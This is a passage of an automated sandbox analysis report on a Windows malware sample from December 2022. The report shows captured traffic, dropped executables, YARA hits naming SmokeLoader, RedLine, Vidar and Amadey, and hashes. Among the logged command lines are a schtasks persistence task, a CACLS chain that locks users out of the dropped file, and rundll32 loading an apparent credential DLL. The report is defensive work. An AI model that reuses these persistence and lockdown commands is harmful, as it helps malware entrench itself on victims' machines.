                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 4740
                                              Host: login.live.com
                                              2022-12-13 19:09:13 UTC619OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                              2022-12-13 19:09:13 UTC623INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: application/soap+xml; charset=utf-8
                                              Expires: Tue, 13 Dec 2022 19:08:13 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: 47170ef0-0748-4ea7-b832-c58f4f8822ab
                                              PPServer: PPV: 30 H: BL02PF4BF2C00DD V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:12 GMT
                                              Connection: close
                                              Content-Length: 11297
                                              2022-12-13 19:09:13 UTC624INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:20:07:45
                                              Start date:13/12/2022
                                              Path:C:\Users\user\Desktop\kmxId0uLRn.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\kmxId0uLRn.exe
                                              Imagebase:0x400000
                                              File size:244736 bytes
                                              MD5 hash:C8782DA2928F63712D03D0EA36C57C3F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low

                                              Target ID:1
                                              Start time:20:07:57
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              Target ID:11
                                              Start time:20:08:51
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Roaming\thgcici
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\thgcici
                                              Imagebase:0x400000
                                              File size:244736 bytes
                                              MD5 hash:C8782DA2928F63712D03D0EA36C57C3F
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 69%, ReversingLabs
                                              Reputation:low

                                              Target ID:12
                                              Start time:20:08:55
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\8F68.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\8F68.exe
                                              Imagebase:0xc10000
                                              File size:559616 bytes
                                              MD5 hash:46F30465FA693033E7D3D78468406C0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Target ID:13
                                              Start time:20:08:55
                                              Start date:13/12/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff745070000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:14
                                              Start time:20:08:56
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\9545.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\9545.exe
                                              Imagebase:0xdd0000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.403992347.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.402947790.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.403831524.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\9545.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 53%, ReversingLabs
                                              Reputation:low

                                              Target ID:17
                                              Start time:20:08:57
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              Target ID:18
                                              Start time:20:09:00
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\explorer.exe
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:19
                                              Start time:20:09:03
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              Target ID:20
                                              Start time:20:09:03
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
                                              Imagebase:0xfa0000
                                              File size:434592 bytes
                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:21
                                              Start time:20:09:04
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
                                              Imagebase:0xf00000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.417948151.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.788503094.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 53%, ReversingLabs

                                              Target ID:22
                                              Start time:20:09:04
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\explorer.exe
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                              Target ID:23
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                                              Imagebase:0xd10000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:24
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff745070000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:25
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
                                              Imagebase:0xb0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:26
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:27
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff745070000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:28
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              Imagebase:0xb0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:29
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Imagebase:0xf00000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                              Target ID:30
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "gntuud.exe" /P "user:N"
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:31
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:32
                                              Start time:20:09:08
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "gntuud.exe" /P "user:R" /E
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:33
                                              Start time:20:09:09
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              Imagebase:0xb0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:34
                                              Start time:20:09:09
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:35
                                              Start time:20:09:09
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "..\2c33368f7d" /P "user:N"
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:36
                                              Start time:20:09:10
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "..\2c33368f7d" /P "user:R" /E
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:38
                                              Start time:20:09:10
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\explorer.exe
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:40
                                              Start time:20:09:12
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:41
                                              Start time:20:09:14
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                                              Imagebase:0x2a0000
                                              File size:61952 bytes
                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi

                                              Target ID:43
                                              Start time:20:10:01
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Roaming\thgcici
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\thgcici
                                              Imagebase:0x400000
                                              File size:244736 bytes
                                              MD5 hash:C8782DA2928F63712D03D0EA36C57C3F
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown

                                              Target ID:44
                                              Start time:20:10:01
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Imagebase:0xf00000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000000.541818627.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000002.547069275.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:2.8%
                                                Dynamic/Decrypted Code Coverage:81.2%
                                                Signature Coverage:37.5%
                                                Total number of Nodes:64
